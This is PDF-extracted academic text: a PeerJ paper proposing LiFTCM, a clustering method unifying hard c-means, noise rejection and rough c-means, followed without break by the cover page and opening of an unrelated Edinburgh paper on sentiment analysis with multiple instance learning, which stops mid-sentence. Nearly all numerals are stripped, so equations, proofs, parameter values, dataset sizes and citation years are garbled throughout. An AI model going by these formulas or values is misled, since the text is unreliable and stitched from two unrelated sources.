cluster centers. a naive strategy is to choose c objects as initial cluster centers from u by simple random sampling without replacement. alternatively, there are strategies that set the initial cluster centers away from each other to reduce initial value dependencies and improve clustering performance, such as kkz (katsavounidis, kuo & zhang, ) and k-means++ (arthur & vassilvitskii, ). general noise rejection (gnr) since hcm is formulated based on the lms criterion, it is strongly affected by noise objects. like tcm, which introduces the lts criterion, the influence of noise objects can be reduced by rejecting objects distant from any cluster. in this type of gnr, each object is assigned to the nearest cluster under the condition that the distance dci is less than or equal to a threshold (noise distance) δ(δ> ): uci=   ( c =argmin ≤l≤c dli∧dci≤δ ) , (otherwise). ( ) the smaller δ is, the more objects are rejected as noise. the noise distance δ can depend on how many (what percentage of) objects to reject as noise. cluster-wise noise rejection (cnr) gnr is based on hcm-based exclusive assignment and cannot represent cluster overlap. by performing noise rejection independently for each cluster, possibilistic aspects that present non-belonging to any cluster and belonging to multiple clusters are achieved. in this type of cnr, noise rejection is performed for each cluster by rejecting objects over δc distant from its center: uci= { (dci≤δc), (otherwise). ( ) the smaller δc is, the more objects are rejected as noise for each cluster c. the cluster-wise noise distance δc can depend on how many (what percentage of) objects to reject as noise for each cluster. generalized rough c-means in rcm-type methods, which are rough set clustering schemes, membership in the lower, upper, and boundary areas of each cluster represents positive, possible, and uncertain ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure grcm: the linear function threshold t and the allowable range of dci (gray area). full-size doi: . /peerjcs. /fig- belonging to the cluster, respectively (lingras & west, ; peters, ; peters et al., ; ubukata, notsu & honda, ). grcm is constructed based on a heuristic scheme, not an objective function. in every iteration, the membership uci of object i to the upper area of cluster c is first calculated as follows: dmini = min ≤l≤c dli, ( ) uci= { (dci≤αd min i +β), (otherwise), ( ) where α (α≥ ) and β (β≥ ) are user-defined parameters that adjust the volume of the upper areas. grcm assigns each object to the upper area of not only its nearest cluster but also of other relatively nearby clusters using a linear function of the distance to its nearest cluster as a threshold. larger α and β imply larger clustering roughness and larger overlap of the upper areas of the clusters. figure shows the linear function threshold t and the allowable range of dci (gray area) in grcm. the membership uci and ûci of object i to the lower and boundary areas, respectively, is calculated using uci as follows: uci=   ( uci= ∧ c∑ l= uli= ) , (otherwise), ( ) ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ûci=   ( uci= ∧ c∑ l= uli = ) , (otherwise) ( ) =uci−uci. ( ) grcm represents each cluster by the three regions. therefore, the new cluster center is determined by the aggregation of the centers of these regions. the cluster center bc is calculated by the convex combination of the centers of the lower, upper, and boundary areas of the cluster c: bc =   ∑n i= ucixi∑n i= uci ( n∑ i= uci= ∨ n∑ i= ûci= ) , w ∑n i= ucixi∑n i= uci +w ∑n i= ucixi∑n i= uci +ŵ ∑n i= ûcixi∑n i= ûci (otherwise), ( ) w,w,ŵ ≥ , ( ) w+w+ŵ = , ( ) where w, w, and ŵ are user-defined parameters that represent the impact of the centers of the lower, upper, and boundary areas, respectively. ubukata, notsu & honda ( ) suggest ŵ = because the centers of the boundary areas tend to cause instability in the calculations and poor classification performance. a unified approach for cluster-wise and general noise rejection approaches in this section, we show that gnr, cnr, and their combinations are realized by the linear function threshold in relaxed grcm. here, we consider relaxing the condition α≥ to α≥ in eq. ( ). hcm in hcm, each object is assigned to the cluster whose center is nearest to the object. this assignment can be interpreted as assigning object i to cluster c if dci is equal to (or less than) dmini , that is, uci= { (dci≤d min i ), (otherwise). ( ) this is the caseα= andβ= in the linear function thresholdαdmini +β for the assignment of upper area in grcm (eq. ( )). figure a shows the linear function threshold t and the allowable range of dci in hcm. the allowable range is limited to the case dci=dmini . we note that if there are multiple nearest cluster centers for an object, hcm requires certain tie- breaking rules for satisfying the sum-to-one constraints, such as exclusive assignment based on cluster priority and uniform assignment by distributing the membership, depending on the implementation. however, in the present linear function threshold-based assignment, an object has membership with respect to all its nearest clusters. the calculation of uci in hcm can be represented by that of uci in grcm. the lower and boundary areas are not used in hcm. thus, the cluster center calculation of hcm ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the linear function threshold t and the allowable range of dci (gray area): (a) hcm, (b) gnr, and (c) cnr. full-size doi: . /peerjcs. /fig- is consistent with that of grcm only using the upper areas, that is, w = in eq. ( ). therefore, grcm(α= ,β= ,w = ) represents hcm. gnr in gnr, a condition that the distance is less than δ is imposed in addition to the threshold- based hcm assignment (eq. ( )) to reject noise objects over δ distant from any clusters. for each object i to be assigned to the cluster c, dci must be equal to (or less than) dmini , and equal to or less than the noise distance δ, that is, uci= { (dci≤d min i ∧dci≤δ), (otherwise). ( ) this assignment can also be approximated using the linear function threshold by setting α= δ−ε δ and β=ε, where ε→+ , that is, uci=   ( dci≤ δ−ε δ dmini +ε ) , (otherwise). ( ) equation ( ) implies that uci = if dci ≤dmini and dci ≤δ. thus, eq. ( ) approaches the update rule eq. ( ). in order to show that eqs. ( ) and ( ) are equivalent, we show that the condition dci≤dmini ∧dci≤δ and the condition dci≤ δ−ε δ dmini +ε are equivalent, under the condition δ> and ε→+ . proposition if dci≤dmini ∧dci≤δ, then dci≤ δ−ε δ dmini +ε. proof. ( ) dci≤dmini ∧dci≤δ (assumption) ( ) dci≤dmini (conjunction elimination: ( )) ( ) dci≤δ (conjunction elimination: ( )) ( ) dmini ≤dci (definition: (eq. ( ))) ( ) dmini ≤δ (transitivity: ( ), ( )) ( ) ε δ dmini + δ−ε δ dmini ≤ ε δ δ+ δ−ε δ dmini (multiply by ε δ and add δ−ε δ dmini in both sides of ( )) ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ( ) dmini ≤ δ−ε δ dmini +ε (deformation: ( )) ( ) dci≤ δ−ε δ dmini +ε (transitivity: ( ), ( )) � proposition if dci≤ δ−ε δ dmini +ε, then dci≤d min i ∧dci≤δ, under the condition that ε is sufficiently small. proof. ( ) dci≤ δ−ε δ dmini +ε (assumption) ( ) dci≤dmini (from ( ) and ε→+ ) ( ) dmini ≤dci (definition: (eq. ( ))) ( ) dci≤ δ−ε δ dci+ε (from ( ), ( )) ( ) δdci≤δdci−εdci+δε (multiply by δ in both sides of ( )) ( ) dci≤δ (deformation: ( )) ( ) dci≤dmini ∧dci≤δ (conjunction introduction: ( ), ( )) � hence, (eq. ( )) induces (eq. ( )), and vice versa. figure b shows the linear function threshold t and the allowable range of dci (gray area) in gnr. since the intersection of the two lines y = δ−ε δ dmini +ε and y =d min i is (δ,δ), if dci >δ, object i is never assigned to cluster c. if dmini ≤δ, the threshold approaches the hcm-based nearest assignment. these characteristics are consistent with those of gnr. similar to hcm, in gnr, the cluster centers are calculated only using the upper areas. therefore, grcm(α= δ−ε δ ,β=ε,w = ) represents gnr. cnr the object-cluster assignment of cnr is determined only by the magnitude relation between dci and δc without considering dmini . we note that the case α= and β=δc in eq. ( ) corresponds to the update rule eq. ( ) of cnr. figure c shows the linear function threshold t and the allowable range of dci (gray area) in cnr. independent of dmini , if dci≤δ, object i is assigned to cluster c. similar to hcm and gnr, in cnr, the cluster centers are calculated only using the upper areas. therefore, grcm(α= ,β=δc,w = ) represents cnr. smooth transition between gnr and cnr by tuning linear function threshold in reference to the threshold-based assignment of gnr, i.e., eq. ( ), we construct the following rule using a parameter t ∈[ ,δc]: uci=   (dci≤ δc−t δc dmini +t), (otherwise). ( ) if t = , then eq. ( ) reduces to eq. ( ) of hcm. if t =ε, where ε→+ , then eq. ( ) changes to eq. ( ) of gnr. if t =δc, then eq. ( ) reduces to eq. ( ) of cnr. if t ∈( ,δc), then eq. ( ) represents the combinations of gnr and cnr. thereby, smooth transition between hcm, gnr, and cnr is realized. ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure combination of gnr and cnr: the linear function threshold t and the allowable range of dci (gray area). full-size doi: . /peerjcs. /fig- figure shows the linear function threshold t and the allowable range of dci (gray area) in the combinations of gnr and cnr. it can be seen that this linear function can transition between the states shown in fig. by t. for practical use, we consider the normalized parameter z ∈[ , ]. we let z = t δc ∈[ , ] and replace t in eq. ( ) with zδc: uci= { (dci≤( −z)d min i +zδc), (otherwise). ( ) then, z = represents hcm, z →+ represents gnr, z ∈ ( , ) represents the combinations of gnr and cnr, and z = represents cnr. by eq. ( ), the threshold value is represented by the convex combination of dmini and δc. that is, hcm, gnr, and cnr can be characterized depending on which of dmini and δc is emphasized as the threshold value. proposed method in this study, we propose liftcm as one of the relaxed grcm. ‘‘lift’’ is an acronym that stands for ‘‘linear function threshold’’ and suggests that the threshold is lifted by the linear function. a sample procedure of liftcm is described in algorithm . although this algorithm just corresponds to the case where the condition α≥ in grcm is relaxed to α≥ , liftcm can represent gnr, cnr, and their combinations in addition to grcm. if ≤α≤ , liftcm includes hcm, gnr, cnr, and their ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm liftcm step . determine α (α≥ ), β (β≥ ), and w,w,ŵ ≥ such that w+w+ŵ = . step . initialize bc. step . calculate uci using eqs. ( ) and ( ). step . calculate uci and ûci using eqs. ( ) and ( ). step . calculate bc using eq. ( ). step . repeat steps - until uci do not change. table relationship between hcm, gnr, cnr, and rough clustering, and their combinations in terms of the linear function threshold in liftcm. linear function threshold: αdmini +β β= β→+ <β α= – – cnr <α< – gnr combinations of gnr and cnr α= hcm hcm lrcm <α prcm prcm combinations of lrcm and prcm (grcm) combinations. if α≥ , liftcm includes hcm, lrcm, prcm, and their combinations. table summarizes the relationships between hcm, gnr, cnr, and rough clustering, and their combinations depending on the values of the parameters α and β in liftcm. as it is difficult to adjust noise sensitivity by directly changing α and β when noise rejection is considered in liftcm, it is convenient to fix the cluster-wise noise distance δc and adjust the combination of hcm, gnr, and cnr by the parameter z ∈[ , ] with α=( −z) and β=zδc. the representations of the conventional methods by setting the parameters of liftcm are summarized as follows: . hcm: liftcm(α= , β= , w = ). . lrcm: liftcm(α= , β≥ , w = ). . prcm: liftcm(α≥ , β= , ŵ = ). . grcm: liftcm(α≥ , β≥ ). . gnr: liftcm(α= −z, β=zδc, z →+ , w = ). . cnr: liftcm(α= , β=δc, w = ). . combinations of gnr and cnr: liftcm(α= −z, β=zδc, z ∈[ , ], w = ). visualization of classification boundaries in this section, we visualize the classification boundaries of the proposed liftcm. liftcm was applied to a grid point dataset, in which n= × objects are uniformly arranged in the unit square [ , ]×[ , ]. c = clusters (c = , , ), which correspond to the primary colors (red,green,blue), respectively, are extracted by liftcm. the rgb-color of object i is determined by (r,g,b)i=( ×u i, ×u i, ×u i). objects belonging to a single cluster are represented by primary colors, objects belonging to multiple clusters are represented by additive colors, and objects not belonging to any cluster are represented ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure classification boundaries of liftcm(α≥ , β≥ , w = ) representing lrcm, prcm, and grcm assignments: (a) liftcm(α= , β= . , w = ) (lrcm assignment), (b) liftcm(α= . , β= , w = ) (prcm assignment), and (c) liftcm(α= . , β= . , w = ) (grcm assignment). full-size doi: . /peerjcs. /fig- by black color. the cluster centers are indicated by cross marks. initial cluster centers were determined by b =( , )>, b =( . , )>, and b =( , )>. figure shows the results of liftcm(α≥ , β ≥ , w = ), which corresponds to grcm(w = ). figure a shows the result of liftcm(α= , β= . , w = ), which is interpreted as the lrcm assignment. figure b shows the result of liftcm(α= . , β= , w = ), which is interpreted as the prcm assignment. figure c shows the result of liftcm(α= . , β= . , w = ), which is interpreted as the grcm assignment. thereby, cluster overlap is realized by lifting the threshold by a linear function. figure shows the results of liftcm(α= −z, β=zδc, z ∈[ , ], w = ) in which noise rejection is intended. the noise distance was set to δc = . and the parameter z was set to { , . , . , . , . , }. figure a shows the result for z = . a hard partition with a voronoi boundary is generated in the same manner as in hcm. figure b shows the result for z = . . such a small value of z realize general noise rejection, that is, objects over δc distant from any cluster are rejected. the boundary between clusters is the voronoi boundary, and objects whose distance to any cluster is greater than the noise distance δc are shown in black and rejected as noise. as z approaches in the order of figs. c– e, the overlap between clusters increases. figure f shows the result for z = . in this case, cluster-wise noise rejection is performed and each cluster is composed of a circle with radius δc centered at the cluster center. by adjusting the threshold relative to δc, cluster overlap and noise rejection are realized simultaneously. thereby, liftcm can realize hcm, grcm, gnr, cnr, and their combinations by lifting the threshold by a linear function. schematic diagram figure is a schematic diagram of the proposal of this study. representations of hcm, lrcm, prcm, grcm, gnr, cnr, and their combinations by the linear function threshold in liftcm with the parameters (α, β), and their relationships are shown. (α,β)=( , ) is the default state and represents hcm assignment. increasing α from and β from increases cluster overlap. simultaneously increasing α and β increases clustering ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure classification boundaries of liftcm(α= − z, β = zδc, w = ) representing hcm, gnr, cnr, and their combinations: (a) z = (hcm), (b) z = . (gnr), (c) z = . (combination), (d) z = . (combination), (e) z = . (combination), and (f) z = (cnr). full-size doi: . /peerjcs. /fig- roughness. this shows combinations of lrcm and prcm, namely, grcm. liftcm gives an interpretation in ≤α≤ in addition to grcm. as proposed in the smooth transition, when the parameter z is increased from to , (α,β) transits from ( , ) to ( ,δc), namely, from hcm to cnr via gnr. the parameter z has the effect of changing clustering more possibilistic. cluster overlap in cnr is attributed to the increase in β in lrcm. the direction in which the destination δc is lowered is the direction in which noise objects are more rejected. numerical experiments this section presents the results of numerical experiments for evaluating the clustering performance of the proposed liftcm with various parameter settings in four real-world datasets downloaded from uci machine learning repository (https://archive.ics.uci.edu/ ml/) and summarized in table . performance was evaluated by the accuracy of class center estimation. the datasets are labeled and include the feature vector and the correct class label of each object. each dataset was partitioned into disjoint classes according to the class labels, and the center of each class (class center) was calculated. liftcm was applied to the generated unlabeled datasets. the number c of clusters was set to the number of classes. to avoid initial value dependence, the initial cluster centers were set to the cluster centers generated by kkz-based hcm. considering the correspondence of the clusters and the ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://archive.ics.uci.edu/ml/ https://archive.ics.uci.edu/ml/ http://dx.doi.org/ . /peerj-cs. figure schematic diagram: representations of hcm, lrcm, prcm, grcm, gnr, cnr, and their combinations by a linear function threshold in liftcm with the parameters (α, β), and their relation- ships. full-size doi: . /peerjcs. /fig- classes, the minimum total error of the cluster centers and the class centers, which is called center-error, was taken as the measurement value. let b̂c be the class center of the class corresponding to cluster c. center-error is calculated by center_error = c∑ c= ||bc−b̂c||. ( ) if the center-error is small, the accuracy of class center estimation is high, and clustering performance is assumed to be high. figure shows the center-error measurements as α and β take equally distributed values using contour lines. colors closer to purple imply smaller center-error and hence better clustering performance. figure a shows the results for the iris dataset. performance is improved at approximately α= and β= . , and when α is increased, performance is maintained by decreasing β. this implies that moderate roughness improves performance. figure b shows the results for the wine dataset. performance is improved at approximately α= . and β = . when α and β exceed certain values, performance deteriorates rapidly. this implies that moderate roughness is acceptable, but excessive roughness degrades performance. figure c shows the results for the glass dataset. performance is improved at approximately α= . and β= . . as with the iris dataset, performance is improved with moderate roughness. figure d shows the results for the breast cancer wisconsin dataset. performance is improved at approximately α= and β= , and it is clear that performance is improved with moderate roughness, as is the case with the iris and the glass datasets. therefore, it is suggested that performance is improved when α and ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table characteristics of the datasets and the range of parameters α, β, δc, and z, which tune the lin- ear function threshold in liftcm. dataset #classes #features #objects (#objects in classes) settings of parameters iris ( , , ) α ∈ [ , . ], β ∈ [ , . ], δc ∈[ . , . ], z ∈[ , ] wine ( , , ) α ∈ [ , . ], β ∈ [ , ], δc ∈[ , ], z ∈[ , ] glass ( , , , , , ) α∈[ , . ], β∈[ , . ], δc ∈[ , ], z ∈[ , ] breast cancer wisconsin ( , ) α∈[ , . ], β ∈[ , ], δc ∈[ , ], z ∈[ , ] β are increased to obtain moderate roughness. thus, the representation of combinations of lrcm and prcm by liftcm performs well. figure shows the center-error measurements as δc and z take equally distributed values using contour lines. figure a shows the results for the iris dataset. performance is improved at approximately δc = . and z = . , or at approximately δc = . and z = . . this implies that setting an appropriate noise distance and combinations of noise and possibilistic clustering yield satisfactory results. figure b shows the results for the wine dataset. performance is improved at approximately δc = and z = . . when δc is increased, performance is maintained by decreasing z. this implies that general noise rejection performs better than cluster-wise noise rejection when the noise distance is large. figure c shows the results for the glass dataset. performance is improved at approximately δc = and z = . . among combinations, those closer to general noise rejection perform well. figure d shows the results for the breast cancer wisconsin dataset. performance is improved at approximately δc = and z = . . as with the other datasets, combinations perform well. as in the case of the wine dataset, states close to general noise rejection perform well when δc is large. therefore, the representation of combinations of gnr and cnr by liftcm is satisfactory. when the noise distance is large, states close to gnr tend to yield satisfactory results. discussion cluster center calculation utilizing probabilistic memberships rcm-type methods have the problem that even if the number of objects in the boundary area is small, they have unnaturally large impacts on the new cluster center compared to the objects in the lower area, because the cluster center is calculated by the convex combination of these areas. to cope with the problem, peters proposed πprcm by introducing the ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure minimum total errors between cluster centers and class centers by liftcm(α≥ , β≥ , w = ) representing grcm(w = ): (a) iris, (b) wine, (c) glass, and (d) breast cancer wisconsin. full-size doi: . /peerjcs. /fig- cluster center calculation based on the normalized membership of the membership to the upper area, which satisfies the probabilistic constraint (peters, ; peters, ). ‘‘π’’ is an acronym that stands for ‘‘principle of indifference,’’ in which the probability is assigned equally by dividing the number of possible clusters. ubukata et al. proposed πgrcm (ubukata et al., ) based on grcm. the proposed liftcm has almost the same formulation as grcm except that the condition α≥ is relaxed to α≥ . thus, πliftcm can be formulated in a similar manner to πgrcm by introducing the following normalized membership ũci of the membership to the upper area and the cluster center calculation based on ũci: ũci= uci∑c l= uli , ( ) bc = ∑n i= ũcixi∑n i= ũci . ( ) here, attention should be paid to the following cases. in the case of α < , that is, in the case of gnr and cnr, since non-belonging of the object to any cluster is handled and ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure minimum total errors between cluster centers and class centers by liftcm(α= − z, β = zδc, z ∈ [ , ], w = ) representing hcm, gnr, cnr, and their combinations: (a) iris, (b) wine, (c) glass, and (d) breast cancer wisconsin. full-size doi: . /peerjcs. /fig- thus the denominator ∑c l= uli can become zero, it is necessary to set ũci= for all clusters in such cases. conclusions in this study, as a unified approach for general noise rejection (gnr) and cluster-wise noise rejection (cnr) in hard c-means (hcm), we proposed linear function threshold- based c-means (liftcm) by relaxing generalized rough c-means (grcm) clustering. we showed that the linear function threshold-based assignment in liftcm can represent gnr, cnr, and their combinations as well as grcm. by the visualization of the classification boundaries, transitions among conventional methods based on liftcm and their characteristics were clarified. in the numerical experiments, the clustering performance by liftcm with various parameter settings was evaluated. it was demonstrated that combinations of lrcm and prcm, or combinations of gnr and cnr by liftcm performed well. ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we plan to investigate the relationship between the proposed method and fuzzy clustering with noise rejection. automatic determination of parameters will also be considered. additional information and declarations funding this work was supported by jsps kakenhi grant numbers jp k , and the program to disseminate tenure tracking system, mext, japan. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: jsps kakenhi: jp k . program to disseminate tenure tracking system, mext, japan. competing interests the authors declare there are no competing interests. author contributions • seiki ubukata conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the raw datasets are available in the supplementary file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references arthur d, vassilvitskii s. . k-means++: the advantages of careful seeding. in: proceedings of the eighteenth annual acm-siam symposium on discrete algorithms. society for industrial and applied mathematics, – . bezdek jc. . pattern recognition with fuzzy objective function algorithms. new york: plenum press. cuesta-albertos ja, gordaliza a, matrán c. . trimmed k-means: an attempt to ro- bustify quantizers. the annals of statistics ( ): – doi . /aos/ . davé rn. . characterization and detection of noise in clustering. pattern recognition letters ( ): – doi . / - ( ) - . ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /aos/ http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. davé rn, krishnapuram r. . robust clustering methods: a unified view. ieee transactions on fuzzy systems ( ): – doi . / . . denœux t, kanjanatarakul o. . evidential clustering: a review. in: international symposium on integrated uncertainty in knowledge modelling and decision making. cham: springer, – . denœux t, masson m. . clustering of proximity data using belief functions. in: intelligent systems for information processing. amsterdam: elsevier, – . denœux t, masson m-h. . evclus: evidential clustering of proximity data. ieee transactions on systems, man, and cybernetics, part b (cybernetics) ( ): – doi . /tsmcb. . . dubes rc, jain ak. . algorithms for clustering data. new jersey: prentice hall englewood cliffs. dunn jc. . a fuzzy relative of the isodata process and its use in detecting compact well-separated clusters. journal of cybernetics ( ): – doi . / . edgeworth fy. . on observations relating to several quantities. hermathena ( ): – . garcía-escudero lÁ, gordaliza a. . robustness properties of k means and trimmed k means. journal of the american statistical association ( ): – doi . / . . . gauss cf. . theoria motus corporum coelestium in sectionibus conicis solem ambientium. hamburg: friedrich perthes und i. h. besser. hampel fr. . beyond location parameters: robust concepts and methods. bulletin of the international statistical institute ( ): – . huber pj. . robust estimation of a location parameter. the annals of mathematical statistics ( ): – . huber pj. . robust statistics. new york: john wiley & sons. katsavounidis i, kuo c-cj, zhang z. . a new initialization technique for generalized lloyd iteration. ieee signal processing letters ( ): – doi . / . . kaufmann l, rousseeuw pj. . clustering by means of medoids. in: dodge y, ed. statistical data analysis based on the l —norm and related methods. amsterdam: elsevier, – . krishnapuram r, keller jm. . a possibilistic approach to clustering. ieee transac- tions on fuzzy systems ( ): – doi . / . . krishnapuram r, keller jm. . the possibilistic c-means algorithm: insights and recommendations. ieee transactions on fuzzy systems ( ): – doi . / . . legendre a-m. . nouvelles méthodes pour la détermination des orbites des cométes. paris: f. didot. lingras p, west c. . interval set clustering of web users with rough k-means. journal of intelligent information systems ( ): – doi . /b:jiis. . . a. ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . / http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /b:jiis. . . a http://dx.doi.org/ . /peerj-cs. macqueen j. . some methods for classification and analysis of multivariate obser- vations. in: proceedings of the fifth berkeley symposium on mathematical statistics and probability, vol. . oakland, – . maji p, pal sk. a. rfcm: a hybrid clustering algorithm using rough and fuzzy sets. fundamenta informaticae ( ): – . maji p, pal sk. b. rough set based generalized fuzzy c-means algorithm and quantitative indices. ieee transactions on systems, man, and cybernetics, part b (cybernetics) ( ): – doi . /tsmcb. . . masson m-h, denœux t. . ecm: an evidential version of the fuzzy c-means algorithm. pattern recognition ( ): – doi . /j.patcog. . . . pal nr, pal k, bezdek jc. . a mixed c-means clustering model. in: proceedings of th international fuzzy systems conference, vol. . ieee, – . pal nr, pal k, keller j. m, bezdek jc. . a possibilistic fuzzy c-means clustering algorithm. ieee transactions on fuzzy systems ( ): – doi . /tfuzz. . . pawlak z. . rough sets. international journal of computer & information sciences ( ): – doi . /bf . pawlak z. . rough sets: theoretical aspects of reasoning about data. vol. . dordrecht: kluwer academic publishers. peters g. . some refinements of rough k-means clustering. pattern recognition ( ): – doi . /j.patcog. . . . peters g. . rough clustering utilizing the principle of indifference. information sciences : – doi . /j.ins. . . . peters g. . is there any need for rough clustering? pattern recognition letters : – doi . /j.patrec. . . . peters g, crespo f, lingras p, weber r. . soft clustering–fuzzy and rough ap- proaches and their extensions and derivatives. international journal of approximate reasoning ( ): – doi . /j.ijar. . . . rousseeuw pj. . least median of squares regression. journal of the american statistical association ( ): – doi . / . . . rousseeuw pj, leroy a. . robust regression and outlier detection. new york: john wiley & sons, inc. ubukata s, kato h, notsu a, honda k. . rough set-based clustering utilizing probabilistic memberships. journal of advanced computational intelligence and intelligent informatics ( ): – doi . /jaciii. .p . ubukata s, notsu a, honda k. . general formulation of rough c-means clustering. international journal of computer science and network security ( ): – . ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /j.ijar. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /jaciii. .p http://dx.doi.org/ . /peerj-cs. edinburgh research explorer multiple instance learning networks for fine-grained sentiment analysis citation for published version: angelidis, s & lapata, m , 'multiple instance learning networks for fine-grained sentiment analysis', transactions of the association for computational linguistics, vol. , pp. - . <https://transacl.org/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/multiple-instance-learning-networks-for-finegrained-sentiment-analysis( b - eb - c - cad- fbc c d).html multiple instance learning networks for fine-grained sentiment analysis stefanos angelidis and mirella lapata institute for language, cognition and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab s.angelidis@ed.ac.uk, mlap@inf.ed.ac.uk abstract we consider the task of fine-grained senti- ment analysis from the perspective of multi- ple instance learning (mil). our neural model is trained on document sentiment labels, and learns to predict the sentiment of text seg- ments, i.e. sentences or elementary discourse units (edus), without segment-level supervi- sion. we introduce an attention-based polar- ity scoring method for identifying positive and negative text snippets and a new dataset which we call spot (as shorthand for segment-level polarity annotations) for evaluating mil- style sentiment models like ours. experimen- tal results demonstrate superior performance against multiple baselines, whereas a judge- ment elicitation study shows that edu-level opinion extraction produces more informative summaries than sentence-based alternatives. introduction sentiment analysis has become a fundamental area of research in natural language processing thanks to the proliferation of user-generated content in the form of online reviews, blogs, internet forums, and social media. a plethora of methods have been pro- posed in the literature that attempt to distill senti- ment information from text, allowing users and ser- vice providers to make opinion-driven decisions. the success of neural networks in a variety of ap- plications (bahdanau et al., ; le and mikolov, ; socher et al., ) and the availability of large amounts of labeled data have led to an in- creased focus on sentiment classification. super- vised models are typically trained on documents (johnson and zhang, a; johnson and zhang, b; tang et al., ; yang et al., ), sen- tences (kim, ), or phrases (socher et al., ; [rating: ??] i had a very mixed experience at the stand. the burger and fries were good. the chocolate shake was divine: rich and creamy. the drive-thru was horrible. it took us at least minutes to order when there were only four cars in front of us. we complained about the wait and got a half–hearted apology. i would go back because the food is good, but my only hesitation is the wait. s um m ar y + the burger and fries were good + the chocolate shake was divine + i would go back because the food is good – the drive-thru was horrible – it took us at least minutes to order figure : an edu-based summary of a -out-of- star review with positive and negative snippets. socher et al., ) annotated with sentiment la- bels and used to predict sentiment in unseen texts. coarse-grained document-level annotations are rel- atively easy to obtain due to the widespread use of opinion grading interfaces (e.g., star ratings ac- companying reviews). in contrast, the acquisition of sentence- or phrase-level sentiment labels re- mains a laborious and expensive endeavor despite its relevance to various opinion mining applica- tions, e.g., detecting or summarizing consumer opin- ions in online product reviews. the usefulness of finer-grained sentiment analysis is illustrated in the example of figure , where snippets of opposing po- larities are extracted from a -star restaurant review. although, as a whole, the review conveys negative sentiment, aspects of the reviewer’s experience were clearly positive. this goes largely unnoticed when focusing solely on the review’s overall rating. in this work, we consider the problem of segment- level sentiment analysis from the perspective of multiple instance learning (mil; keeler, ). transactions of the association for computational linguistics, vol. , pp. – , . action editor: ani nenkova. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. instead of learning from individually labeled seg- ments, our model only requires document-level su- pervision and learns to introspectively judge the sen- timent of constituent segments. beyond showing how to utilize document collections of rated reviews to train fine-grained sentiment predictors, we also investigate the granularity of the extracted segments. previous research (tang et al., ; yang et al., ; cheng and lapata, ; nallapati et al., ) has predominantly viewed documents as se- quences of sentences. inspired by recent work in summarization (li et al., ) and sentiment clas- sification (bhatia et al., ), we also represent documents via rhetorical structure theory’s (mann and thompson, ) elementary discourse units (edus). although definitions for edus vary in the literature, we follow standard practice and take the elementary units of discourse to be clauses (carlson et al., ). we employ a state-of-the-art discourse parser (feng and hirst, ) to identify them. our contributions in this work are three-fold: a novel multiple instance learning neural model which utilizes document-level sentiment supervision to judge the polarity of its constituent segments; the creation of spot, a publicly available dataset which contains segment-level polarity annotations (for sentences and edus) and can be used for the eval- uation of mil-style models like ours; and the em- pirical finding (through automatic and human-based evaluation) that neural multiple instance learning is superior 